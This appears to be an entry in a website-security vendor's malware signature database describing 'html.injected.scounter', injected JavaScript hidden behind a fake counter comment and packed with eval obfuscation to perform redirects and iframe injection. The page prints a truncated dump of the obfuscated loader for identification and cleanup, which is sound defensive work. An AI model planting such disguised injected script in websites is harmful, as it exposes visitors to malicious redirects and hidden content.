Malware Signatures

  1. Home
  2. Malware Signatures
  3. html.injected.scounter

html.injected.scounter

This malware is crafted to act as a part of a valid counter script for the untrained eye, using a decieving comment: <!--scounter--> and javascript obfuscation to difficult its understanding.
From all payloads found related to html.injected.scounter the most common are conditional redirect and iframe injection.

Affecting

Any website running vulnerable software or hosted on a server with compromised credentials

Cleanup

Inspect your website for any entry of and remove the related code.

Dump

<!--scounter--><script language="JavaScript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?&#39;&#39;:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!&#39;&#39;.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return&#39;\w+&#39;};c=1};